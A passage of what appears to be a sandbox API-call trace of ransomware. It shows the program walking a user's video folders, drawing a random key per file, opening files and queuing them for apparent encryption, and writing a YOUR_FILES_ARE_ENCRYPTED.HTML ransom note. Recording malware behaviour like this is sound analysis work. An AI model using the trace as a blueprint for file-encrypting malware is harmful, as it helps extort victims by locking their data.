dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c4 [0168.830] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=28722) returned 1 [0168.830] GetProcessHeap () returned 0x270000 [0168.830] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a700 [0168.834] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="64") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="80") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="94") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="A6") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="37") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="C3") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="45") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="B2") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="44") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="47") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="E4") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="B8") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="01") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="6F") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="F3") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="29") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="5B") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="D7") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="71") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="4D") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="9C") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="10") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="3A") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="BF") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="3E") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="DC") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="2A") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="F9") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="3F") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="93") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="15") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="07") returned 2 [0168.835] lstrcpyW (in: lpString1=0x756a7b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4" [0168.835] CreateIoCompletionPort (FileHandle=0x5c4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a700, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.835] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a700, lpOverlapped=0x755a700) returned 1 [0168.836] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2519300, ftCreationTime.dwHighDateTime=0x1d7e19d, ftLastAccessTime.dwLowDateTime=0xe1afab00, ftLastAccessTime.dwHighDateTime=0x1d7e31a, ftLastWriteTime.dwLowDateTime=0xe1afab00, ftLastWriteTime.dwHighDateTime=0x1d7e31a, nFileSizeHigh=0x0, nFileSizeLow=0x448f, dwReserved0=0x0, dwReserved1=0x60, cFileName="vzShdqRj6_EwnV827p.mkv", cAlternateFileName="VZSHDQ~1.MKV")) returned 1 [0168.836] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\vzShdqRj6_EwnV827p.mkv") returned 96 [0168.836] lstrcmpW (lpString1="vzShdqRj6_EwnV827p.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.836] PathFindExtensionW (pszPath="vzShdqRj6_EwnV827p.mkv") returned=".mkv" [0168.836] lstrlenW (lpString=".mkv") returned 4 [0168.836] PathFindExtensionW (pszPath="vzShdqRj6_EwnV827p.mkv") returned=".mkv" [0168.836] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2519300, ftCreationTime.dwHighDateTime=0x1d7e19d, ftLastAccessTime.dwLowDateTime=0xe1afab00, ftLastAccessTime.dwHighDateTime=0x1d7e31a, ftLastWriteTime.dwLowDateTime=0xe1afab00, ftLastWriteTime.dwHighDateTime=0x1d7e31a, nFileSizeHigh=0x0, nFileSizeLow=0x448f, dwReserved0=0x0, dwReserved1=0x60, cFileName="vzShdqRj6_EwnV827p.mkv", cAlternateFileName="VZSHDQ~1.MKV")) returned 0 [0168.836] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.836] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0168.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0168.837] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.839] CloseHandle (hObject=0x4a8) returned 1 [0168.839] GetProcessHeap () returned 0x270000 [0168.840] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ab480 | out: hHeap=0x270000) returned 1 [0168.840] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="y0DAHsSstBIa", cAlternateFileName="Y0DAHS~1")) returned 1 [0168.840] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa") returned 75 [0168.840] GetProcessHeap () returned 0x270000 [0168.840] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ab480 [0168.840] lstrcpyW (in: lpString1=0x74ab480, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa" [0168.840] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\*" [0168.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b9a5160, ftCreationTime.dwHighDateTime=0x1d7e115, ftLastAccessTime.dwLowDateTime=0x77de1f80, ftLastAccessTime.dwHighDateTime=0x1d7e5eb, ftLastWriteTime.dwLowDateTime=0x77de1f80, ftLastWriteTime.dwHighDateTime=0x1d7e5eb, nFileSizeHigh=0x0, nFileSizeLow=0xb8b3, dwReserved0=0x0, dwReserved1=0x60, cFileName="BQ2mqjFOjzf.swf", cAlternateFileName="BQ2MQJ~1.SWF")) returned 1 [0168.841] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\BQ2mqjFOjzf.swf") returned 91 [0168.841] lstrcmpW (lpString1="BQ2mqjFOjzf.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.841] PathFindExtensionW (pszPath="BQ2mqjFOjzf.swf") returned=".swf" [0168.841] lstrlenW (lpString=".swf") returned 4 [0168.841] PathFindExtensionW (pszPath="BQ2mqjFOjzf.swf") returned=".swf" [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69a396f0, ftCreationTime.dwHighDateTime=0x1d7d8c3, ftLastAccessTime.dwLowDateTime=0x90a036d0, ftLastAccessTime.dwHighDateTime=0x1d7db04, ftLastWriteTime.dwLowDateTime=0x90a036d0, ftLastWriteTime.dwHighDateTime=0x1d7db04, nFileSizeHigh=0x0, nFileSizeLow=0x12143, dwReserved0=0x0, dwReserved1=0x60, cFileName="c8Ep8C79JgsBT9QX4q.mkv", cAlternateFileName="C8EP8C~1.MKV")) returned 1 [0168.841] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\c8Ep8C79JgsBT9QX4q.mkv") returned 98 [0168.841] lstrcmpW (lpString1="c8Ep8C79JgsBT9QX4q.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.841] PathFindExtensionW (pszPath="c8Ep8C79JgsBT9QX4q.mkv") returned=".mkv" [0168.841] lstrlenW (lpString=".mkv") returned 4 [0168.841] PathFindExtensionW (pszPath="c8Ep8C79JgsBT9QX4q.mkv") returned=".mkv" [0168.841] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1792aa90, ftCreationTime.dwHighDateTime=0x1d7e1bf, ftLastAccessTime.dwLowDateTime=0x8f1d8a10, ftLastAccessTime.dwHighDateTime=0x1d7e239, ftLastWriteTime.dwLowDateTime=0x8f1d8a10, ftLastWriteTime.dwHighDateTime=0x1d7e239, nFileSizeHigh=0x0, nFileSizeLow=0x11985, dwReserved0=0x0, dwReserved1=0x60, cFileName="CEqDre8Jxqkiwy.avi", cAlternateFileName="CEQDRE~1.AVI")) returned 1 [0168.841] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi") returned 94 [0168.841] lstrcmpW (lpString1="CEqDre8Jxqkiwy.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.841] PathFindExtensionW (pszPath="CEqDre8Jxqkiwy.avi") returned=".avi" [0168.841] lstrlenW (lpString=".avi") returned 4 [0168.841] PathFindExtensionW (pszPath="CEqDre8Jxqkiwy.avi") returned=".avi" [0168.841] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\ceqdre8jxqkiwy.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c8 [0168.843] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=72069) returned 1 [0168.843] GetProcessHeap () returned 0x270000 [0168.843] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0168.846] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="40") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="19") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="4D") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="75") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="F1") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="32") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="EF") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="FF") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="11") returned 2 [0168.846] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="CC") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8A") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="4C") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="4D") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="1B") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="02") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="A9") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="F1") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="7B") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="F0") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="41") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="A0") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C6") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="CD") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="ED") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="0F") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="8B") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="49") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="66") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="44") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="D1") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="E0") returned 2 [0168.847] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="1C") returned 2 [0168.848] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi" [0168.848] CreateIoCompletionPort (FileHandle=0x5c8, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.848] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0168.848] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f360f0, ftCreationTime.dwHighDateTime=0x1d7e6e9, ftLastAccessTime.dwLowDateTime=0xb4cddbf0, ftLastAccessTime.dwHighDateTime=0x1d7e77c, ftLastWriteTime.dwLowDateTime=0xb4cddbf0, ftLastWriteTime.dwHighDateTime=0x1d7e77c, nFileSizeHigh=0x0, nFileSizeLow=0x9d0a, dwReserved0=0x0, dwReserved1=0x60, cFileName="CO4O ON4.flv", cAlternateFileName="CO4OON~1.FLV")) returned 1 [0168.848] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv") returned 88 [0168.848] lstrcmpW (lpString1="CO4O ON4.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.848] PathFindExtensionW (pszPath="CO4O ON4.flv") returned=".flv" [0168.848] lstrlenW (lpString=".flv") returned 4 [0168.848] PathFindExtensionW (pszPath="CO4O ON4.flv") returned=".flv" [0168.848] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\y0dahssstbia\\co4o on4.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d0 [0168.849] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=40202) returned 1 [0168.849] GetProcessHeap () returned 0x270000 [0168.849] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0168.852] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="B6") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="30") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="45") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="B8") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="F9") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="37") returned 2 [0168.852] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="A3") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="B5") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="95") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="DF") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="57") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="C9") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="DF") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="31") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="53") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="55") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="45") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="D9") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="12") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="00") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="36") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C0") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="02") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="8E") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="19") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="3A") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="8B") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="0C") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="42") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="3B") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="60") returned 2 [0168.853] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="69") returned 2 [0168.854] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv" [0168.854] CreateIoCompletionPort (FileHandle=0x5d0, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.854] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0168.854] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca45cd0, ftCreationTime.dwHighDateTime=0x1d7da35, ftLastAccessTime.dwLowDateTime=0x2c8d1920, ftLastAccessTime.dwHighDateTime=0x1d7dfb8, ftLastWriteTime.dwLowDateTime=0x2c8d1920, ftLastWriteTime.dwHighDateTime=0x1d7dfb8, nFileSizeHigh=0x0, nFileSizeLow=0x14870, dwReserved0=0x0, dwReserved1=0x60, cFileName="o7CtnS.mkv", cAlternateFileName="")) returned 1 [0168.854] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\o7CtnS.mkv") returned 86 [0168.854] lstrcmpW (lpString1="o7CtnS.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.854] PathFindExtensionW (pszPath="o7CtnS.mkv") returned=".mkv" [0168.854] lstrlenW (lpString=".mkv") returned 4 [0168.854] PathFindExtensionW (pszPath="o7CtnS.mkv") returned=".mkv" [0168.854] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ef2720, ftCreationTime.dwHighDateTime=0x1d7d9bc, ftLastAccessTime.dwLowDateTime=0x21124df0, ftLastAccessTime.dwHighDateTime=0x1d7e214, ftLastWriteTime.dwLowDateTime=0x21124df0, ftLastWriteTime.dwHighDateTime=0x1d7e214, nFileSizeHigh=0x0, nFileSizeLow=0xd07e, dwReserved0=0x0, dwReserved1=0x60, cFileName="xa_lhgCiG.avi", cAlternateFileName="XA_LHG~1.AVI")) returned 1 [0168.854] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi") returned 89 [0168.855] lstrcmpW (lpString1="xa_lhgCiG.avi", 